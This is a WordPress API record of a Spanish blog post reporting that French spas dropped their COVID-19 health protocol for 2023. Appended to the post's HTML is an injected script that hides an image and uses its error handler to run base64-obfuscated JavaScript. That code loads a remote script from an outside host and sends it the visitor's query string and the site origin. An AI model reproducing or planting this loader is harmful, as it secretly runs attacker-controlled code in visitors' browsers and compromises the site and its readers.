{"id":6511,"date":"2023-03-15T12:49:10","date_gmt":"2023-03-15T15:49:10","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6511"},"modified":"2025-08-13T16:04:02","modified_gmt":"2025-08-13T19:04:02","slug":"covid-19-y-tratamientos-de-spa-en-francia-que-protocolo-sanitario-para-2023","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6511","title":{"rendered":"COVID-19 y tratamientos de spa en Francia: \u00bfqu\u00e9 protocolo sanitario para 2023?"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#0f9f6b\"><strong><em>Desde el comienzo de la pandemia de Covid-19, el Consejo Nacional de Establecimientos Termales hab\u00eda establecido un sistema de referencia sanitaria para todos los centros termales de Francia. El organismo nacional acaba de anunciar que no se impondr\u00e1 ning\u00fan protocolo sanitario especial a los balnearios para la temporada 2023.<\/em><\/strong><\/h4>\n\n\n\n<p>Si bien los \u00faltimos a\u00f1os han estado marcados por la presencia de fuertes medidas en los centros termales para contrarrestar el Covid-19, el Consejo Nacional de Establecimientos Termales (CNETh) ha decidido&nbsp;<strong>levantar la aplicaci\u00f3n del protocolo sanitario&nbsp;<\/strong>para la temporada termal 2023. Esta decisi\u00f3n llega con el acuerdo de la Direcci\u00f3n General de Salud (DGS) \u00ab<em>a favor de la evoluci\u00f3n de la epidemia<\/em>\u00ab.&nbsp;<\/p>\n\n\n\n<p>Concretamente, si planea ir a un spa en 2023, ya no estar\u00e1 sujeto a la presentaci\u00f3n de un programa de vacunaci\u00f3n completo o una prueba de ant\u00edgenos negativa. El uso de mascarilla y el distanciamiento social ya no son obligatorios. Sin embargo, el CNETh recomienda seguir&nbsp;las&nbsp;<strong>recomendaciones generales de salud&nbsp;<\/strong>relativas a la lucha contra las enfermedades respiratorias y el Covid-19. Se refieren en particular a:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>usar&nbsp;<strong>una m\u00e1scara<\/strong>&nbsp;para personas en riesgo o sintom\u00e1ticas;&nbsp;<\/li>\n\n\n\n<li><strong>la desinfecci\u00f3n regular de las manos<\/strong>&nbsp;con soluciones hidroalcoh\u00f3licas disponibles en los establecimientos;&nbsp;<\/li>\n\n\n\n<li><strong>Ventilaci\u00f3n\u00a0<\/strong>regular\u00a0de las instalaciones.\u00a0<\/li>\n<\/ul>\n\n\n\n<p>Sin embargo, los spas se reservan el derecho de exigir el uso de m\u00e1scaras, tanto para los hu\u00e9spedes del spa como para su personal, si lo consideran necesario.\u00a0\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.officiel-thermalisme.com\/2023\/03\/06\/covid-19-fin-application-mesures-sanitaires-thermes-2023\/?utm_source=L%27Officiel+du+Thermalisme&amp;utm_campaign=25de360db9-EMAIL_CAMPAIGN_2021_09_30_01_17_COPY_01&amp;utm_medium=email&amp;utm_term=0_4a2750a4c7-25de360db9-1357231813\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/03\/Captura-web_15-3-2023_124725_www.officiel-thermalisme.com_.jpeg\" alt=\"\" class=\"wp-image-6512\" width=\"214\" height=\"78\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Desde el comienzo de la pandemia de Covid-19, el Consejo Nacional de Establecimientos Termales hab\u00eda establecido un sistema de referencia sanitaria para todos los centros termales de Francia. El organismo nacional acaba de anunciar que no se impondr\u00e1 ning\u00fan protocolo sanitario especial a los balnearios para la temporada 2023. Si bien los \u00faltimos a\u00f1os han [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6513,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[28],"tags":[],"class_list":["post-6511","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-portales-de-servicios-e-informacion"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6511","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6511"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6511\/revisions"}],"predecessor-version":[{"id":10455,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6511\/revisions\/10455"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6513"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6511"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6511"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6511"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}